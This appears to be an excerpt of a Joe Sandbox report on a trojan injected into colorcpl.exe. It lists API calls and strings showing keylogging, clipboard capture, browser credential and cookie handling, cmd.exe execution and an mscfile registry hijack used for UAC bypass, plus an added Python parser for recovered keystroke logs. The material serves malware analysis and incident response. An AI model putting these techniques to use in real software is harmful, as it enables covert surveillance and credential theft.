                                                              • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction ID: c85cbcf84eeab447b478f0edaf816672991371d8f73e2127238d18941aa0dc28
                                                              • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
                                                              • Instruction Fuzzy Hash: B9518275E013099FDF14DFA9C880AEDFBF9EF88314F2581A9E455E7340EA759A018B50
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 030D0975
                                                              • _free.LIBCMT ref: 030D0A40
                                                              • _free.LIBCMT ref: 030D0A4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Windows\SysWOW64\colorcpl.exe
                                                              • API String ID: 2506810119-1707929182
                                                              • Opcode ID: a50c7169cc900aab77d0a659abaf36c5b0ff68aebe0937ccaca3090fe34da965
                                                              • Instruction ID: 3a93d77e356cc8bd9e97d8d5a90d64c4a9d018721f0a4df78193780139ca104f
                                                              • Opcode Fuzzy Hash: a50c7169cc900aab77d0a659abaf36c5b0ff68aebe0937ccaca3090fe34da965
                                                              • Instruction Fuzzy Hash: 15319475A02359EFDB21EF99D8C4ADEFBFCEF85710F1440AAE4099B200D6B18A45CB51
                                                              APIs
                                                                • Part of subcall function 030A2006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,03102248,03101FFC), ref: 030A2030
                                                                • Part of subcall function 030A2006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 030A204B
                                                                • Part of subcall function 030A2006: RegCloseKey.ADVAPI32(00000000), ref: 030A2054
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                              • _wcslen.LIBCMT ref: 030A9744
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                              • String ID: .exe$program files (x86)\$program files\
                                                              • API String ID: 37874593-1203593143
                                                              • Opcode ID: 37ca558601e52cceede0bb14b1daa5061802a2e41bfbccc5c1746aa637fd865e
                                                              • Instruction ID: a89e943e5b2d317368d879ddb3470a3ca1f24fc2665a3d0253d5d4d6314e0280
                                                              • Opcode Fuzzy Hash: 37ca558601e52cceede0bb14b1daa5061802a2e41bfbccc5c1746aa637fd865e
                                                              • Instruction Fuzzy Hash: 0C214766B023087BEF18FBF89C959FE76AD9AC5110704053EE505AF281EE254D099261
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                              • wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                               • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EventLocalTimewsprintf
                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                              • API String ID: 1497725170-1359877963
                                                              • Opcode ID: 17e171a51b098ea476668ee586987b6286fb3fab3f20b50a9d76b310eb29bd73
                                                              • Instruction ID: 66ef7f9a3f6ee9f071df7a05e53bed5aa4764a50eb643d3b5ea4b7255a6967a8
                                                              • Opcode Fuzzy Hash: 17e171a51b098ea476668ee586987b6286fb3fab3f20b50a9d76b310eb29bd73
                                                              • Instruction Fuzzy Hash: 8211547A50521CAADB0DFB95EC548FE77BCEE98310B00011FF4065A580EF786A46D6A4
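                                                               Added example (not part of the Joe Sandbox report and not code from the analysed sample): a Python parser for a keystroke log written with the GetLocalTime + wsprintfW format string listed above. Only the bracketed timestamp prefix and the "Online Keylogger Started" marker (a string this report lists for the thread-creating function) come from the report; that the remainder of the bracket holds the foreground window title, and that typed text follows on the lines up to the next header, is an assumption made for this example, as is the sample log itself.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List

# Constructed sample of a recovered keystroke log. The bracketed timestamp prefix follows the
# wsprintfW format string listed in the report ("[%04i/%02i/%02i %02i:%02i:%02i "); that the
# rest of the bracket holds the foreground window title, and that the typed text follows on
# the next lines until the next header, is an assumption made for this example.
SAMPLE_LOG = """\
Online Keylogger Started
[2024/12/19 09:14:05 Untitled - Notepad]
meeting notes for monday
[2024/12/19 09:16:40 Sign in - Google Chrome]
alice@example.com[TAB]hunter2[ENTER]
Online Keylogger Started
[2024/12/19 11:02:13 Untitled - Notepad]
second session
[2024/13/40 99:99:99 not a real date]
"""

START_MARKER = "Online Keylogger Started"   # string the report lists for the logger thread
HEADER = re.compile(r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")


@dataclass
class Entry:
    session: int            # 1-based count of START_MARKER lines seen before this entry
    when: datetime
    window: str
    keys: List[str] = field(default_factory=list)

    @property
    def text(self) -> str:
        return "\n".join(self.keys)


def parse_keylog(text: str) -> List[Entry]:
    """Split a log into entries, one per timestamp header. Each START_MARKER opens a new
    session (the logger was restarted). Lines after a header, up to the next header or marker,
    are the keystrokes for that window. A header-shaped line whose fields do not form a valid
    date is kept as typed text instead of aborting the parse."""
    entries: List[Entry] = []
    session, current = 0, None
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if line == START_MARKER:
            session += 1
            current = None
            continue
        m = HEADER.match(line)
        if m:
            try:
                when = datetime(*(int(g) for g in m.groups()[:6]))
            except ValueError:
                when = None
            if when is not None:
                current = Entry(session, when, m.group(7))
                entries.append(current)
                continue
        if current is not None and line:
            current.keys.append(line)
    return entries


def windows_by_keystrokes(entries: List[Entry]):
    """Rank window titles by how much text was captured in them: a quick triage of what the
    operator obtained (logins, mail clients) from a recovered log."""
    totals = {}
    for e in entries:
        totals[e.window] = totals.get(e.window, 0) + len(e.text)
    return sorted(totals.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for e in parse_keylog(SAMPLE_LOG):
        print(f"session {e.session} {e.when:%Y-%m-%d %H:%M:%S} [{e.window}] {e.text!r}")
```

                                                               Feed it the decoded log file; the session counter gives the number of logger restarts, which lines up with the CreateThread calls the report shows next to the start marker, and the per-window totals point at the entries that need credential-reset follow-up.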
                                                              APIs
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 03099EB7
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 03099EC3
                                                              • CreateThread.KERNEL32(00000000,00000000,0309931D,?,00000000,00000000), ref: 03099ECF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                              • String ID: Online Keylogger Started
                                                              • API String ID: 112202259-1258561607
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,03096039,?,00000000), ref: 03096090
                                                              • GetProcAddress.KERNEL32(00000000), ref: 03096097
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: CryptUnprotectData$crypt32
                                                              • API String ID: 2574300362-2380590389
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,03095139), ref: 03095153
                                                              • CloseHandle.KERNEL32(?), ref: 030951AA
                                                              • SetEvent.KERNEL32(?), ref: 030951B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandleObjectSingleWait
                                                              • String ID: Connection Timeout
                                                              • API String ID: 2055531096-499159329
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309D25E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-1866435925
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 030A487B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExecuteShell
                                                              • String ID: /C $cmd.exe$open
                                                              • API String ID: 587946157-3896048727
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,03102248,03101FFC), ref: 030A2030
                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 030A204B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 030A2054
                                                              Strings
                                                              • http\shell\open\command, xrefs: 030A2026
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: http\shell\open\command
                                                              • API String ID: 3677997916-1487954565
                                                              APIs
                                                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 030A220F
                                                              • RegSetValueExW.ADVAPI32(?,030F9654,00000000,?,00000000,00000000,030F9654,?,0309674F,030F9654,C:\Windows\SysWOW64\colorcpl.exe), ref: 030A223E
                                                              • RegCloseKey.ADVAPI32(?,?,0309674F,030F9654,C:\Windows\SysWOW64\colorcpl.exe), ref: 030A2249
                                                              Strings
                                                              • Software\Classes\mscfile\shell\open\command, xrefs: 030A220D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Software\Classes\mscfile\shell\open\command
                                                              • API String ID: 1818849710-505396733
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0309C9D9
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0309CA18
                                                                • Part of subcall function 030C33ED: _Yarn.LIBCPMT ref: 030C340C
                                                                • Part of subcall function 030C33ED: _Yarn.LIBCPMT ref: 030C3430
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0309CA3E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                              • String ID: bad locale name
                                                              • API String ID: 3628047217-1405518554
                                                              APIs
                                                              Strings
                                                              • Cleared browsers logins and cookies., xrefs: 0309B036
                                                              • [Cleared browsers logins and cookies.], xrefs: 0309B025
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                              • API String ID: 3472027048-1236744412
                                                              APIs
                                                                • Part of subcall function 030AA2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 030AA2EB
                                                                • Part of subcall function 030AA2DB: GetWindowTextLengthW.USER32(00000000), ref: 030AA2F4
                                                                • Part of subcall function 030AA2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 030AA31E
                                                              • Sleep.KERNEL32(000001F4), ref: 0309955A
                                                              • Sleep.KERNEL32(00000064), ref: 030995F5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$ForegroundLength
                                                              • String ID: [ $ ]
                                                              • API String ID: 3309952895-93608704
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue), ref: 030D5AC7
                                                              • GetLastError.KERNEL32(?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue,030EC110,030EC118,00000000,00000364,?,030D57F7), ref: 030D5AD3
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,030D5A3C,00000000,00000000,00000000,00000000,?,030D5D68,00000006,FlsSetValue,030EC110,030EC118,00000000), ref: 030D5AE1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA23C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA261
                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,030A5A44), ref: 030AA26F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 3919263394-0
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 030C761A
                                                                • Part of subcall function 030C7C52: ___AdjustPointer.LIBCMT ref: 030C7C9C
                                                              • _UnwindNestedFrames.LIBCMT ref: 030C7631
                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 030C7643
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 030C7667
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                              • String ID:
                                                              • API String ID: 2633735394-0
                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction ID: 8824733de5819347f3a1da6bc799e74dee64817ea9db8e8ac4ae9c8048daea06
                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                              • Instruction Fuzzy Hash: DA011736011289BFCF529F69CC40EDE7BBAEF88B54F058018F91865120C336E861EFA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000004C), ref: 030A73AA
                                                              • GetSystemMetrics.USER32(0000004D), ref: 030A73B0
                                                              • GetSystemMetrics.USER32(0000004E), ref: 030A73B6
                                                              • GetSystemMetrics.USER32(0000004F), ref: 030A73BC
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MetricsSystem
                                                              • String ID:
                                                              • API String ID: 4116985748-0
                                                              • Opcode ID: ef81bb85cbb1d2d31dd2b96fe8df3e74f461139ab0ad5d7a805023f4a171fef0
                                                              • Instruction ID: bb6ad69959738e4d151a4eba42f92429109dd17c4689cfd7a53b1489d5a76fd0
                                                              • Opcode Fuzzy Hash: ef81bb85cbb1d2d31dd2b96fe8df3e74f461139ab0ad5d7a805023f4a171fef0
                                                              • Instruction Fuzzy Hash: E2F0A4A2B017154FD740EAF9A840A2F6AD99BD4560F10442EE6458B281EFB9DC058790
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 030D01ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 5af013d2910ae7cb1dd20d718bdc5b5791bf7e77b29d1d708ff0c91cde6f840c
                                                              • Instruction ID: 0ce8df328fd9b5c41926189d6ae201b3901343d926257a82b76957ce783a7477
                                                              • Opcode Fuzzy Hash: 5af013d2910ae7cb1dd20d718bdc5b5791bf7e77b29d1d708ff0c91cde6f840c
                                                              • Instruction Fuzzy Hash: CA519365B0730296DB51F71CCA003BE7BD4DB40B50F2C4E58E4DA4A2DDEB398895CA46
                                                              APIs
                                                                • Part of subcall function 030C2525: __onexit.LIBCMT ref: 030C252B
                                                              • __Init_thread_footer.LIBCMT ref: 0309A6E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Init_thread_footer__onexit
                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                              • API String ID: 1881088180-3686566968
                                                              • Opcode ID: 1265d97c3cf5668b055c2efdf8b9b0b3d4b46af0236cb2f16301a5f7fa4f8811
                                                              • Instruction ID: cec83dadfd467af8c31a7fbcb51849e26ffcdb58301bea033795689e00b1a8cc
                                                              • Opcode Fuzzy Hash: 1265d97c3cf5668b055c2efdf8b9b0b3d4b46af0236cb2f16301a5f7fa4f8811
                                                              • Instruction Fuzzy Hash: 5421B639B123095FEF08FBA4DCA1DEEB379AFD4210F50056AD5165F191DF309A4AD640
                                                              APIs
                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,030DEF72,?,00000050,?,?,?,?,?), ref: 030DEDF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ACP$OCP
                                                              • API String ID: 0-711371036
                                                              • Opcode ID: 38bb0f5b298e4f52d0befe1d306622e090414746b18dc63367b0407f09f9dc03
                                                              • Instruction ID: 7070218d1ea71d7f1f8a797d30f2ae3589a38f517a315d32885af5348b001cd4
                                                              • Opcode Fuzzy Hash: 38bb0f5b298e4f52d0befe1d306622e090414746b18dc63367b0407f09f9dc03
                                                              • Instruction Fuzzy Hash: F721F866A02304A6E774DB54CD00BABB3EAEF44E50F5A4464ED0ADF10CEF32D900C360
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,031024A8,?,00000000,?,?,?,?,?,?,030A46C2,?,00000001,0000004C,00000000), ref: 03095010
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • GetLocalTime.KERNEL32(?,031024A8,?,00000000,?,?,?,?,?,?,030A46C2,?,00000001,0000004C,00000000), ref: 03095067
                                                              Strings
                                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 03094FFF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                                              • API String ID: 481472006-507513762
                                                              • Opcode ID: 8191d0b250c8c1b1bce73bbcef5db22d0388b03bc89d93479aa69a95a795c798
                                                              • Instruction ID: e3a2c44b7a9486154350f6e33f23990b5a1e6a01b41773739be9dfe91a0d9028
                                                              • Opcode Fuzzy Hash: 8191d0b250c8c1b1bce73bbcef5db22d0388b03bc89d93479aa69a95a795c798
                                                              • Instruction Fuzzy Hash: 64214925A023445BEB0AF765DC2C7AAB798A7CB208F040D1EE8400B185DB755649C7E7
                                                              APIs
                                                              • GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                              • API String ID: 481472006-2430845779
                                                              • Opcode ID: aee3d4a8a7b3c16c0254e5273664deca97f7103c9891edbff7fed0db5aa96ba7
                                                              • Instruction ID: bd1511a7543ea6a530f1897b72d856ac31ece810dcaba97aa4537f9ae3367ffd
                                                              • Opcode Fuzzy Hash: aee3d4a8a7b3c16c0254e5273664deca97f7103c9891edbff7fed0db5aa96ba7
                                                              • Instruction Fuzzy Hash: B31196352093095ADB08FBA4D8508EFF3E8AFD4200F500A1FF4958A1D1EF38D945D751
                                                              APIs
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CloseHandle.KERNEL32(?), ref: 03099FFD
                                                              • UnhookWindowsHookEx.USER32 ref: 0309A010
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                              • String ID: Online Keylogger Stopped
                                                              • API String ID: 1623830855-1496645233
                                                              • Opcode ID: 214f03ff3f2f3eeee418dfe653e90a5332711ebb5938cac0c0d2edb77d0b4283
                                                              • Instruction ID: 0ccfb860eed837cbc7d4a911b7949a9e3f4066c375efffb8ec464e62b51910ce
                                                              • Opcode Fuzzy Hash: 214f03ff3f2f3eeee418dfe653e90a5332711ebb5938cac0c0d2edb77d0b4283
                                                              • Instruction Fuzzy Hash: 8C01F538B063085BFF25FB68D8067FD7BB98BC2310F44094FC5410A542DBA62556E7D6
                                                              APIs
                                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0309B53E,?), ref: 0309B437
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                              • API String ID: 1174141254-4188645398
                                                              • Opcode ID: efd12b897d0a38b02dd8a097c5e2f4ebd1cf92bd978ed895f4dc3dac38740d97
                                                              • Instruction ID: d2dc2a29d3e52101f5ef3cece928628ff882993dc7e6aa84ba81b75dab6fdfc4
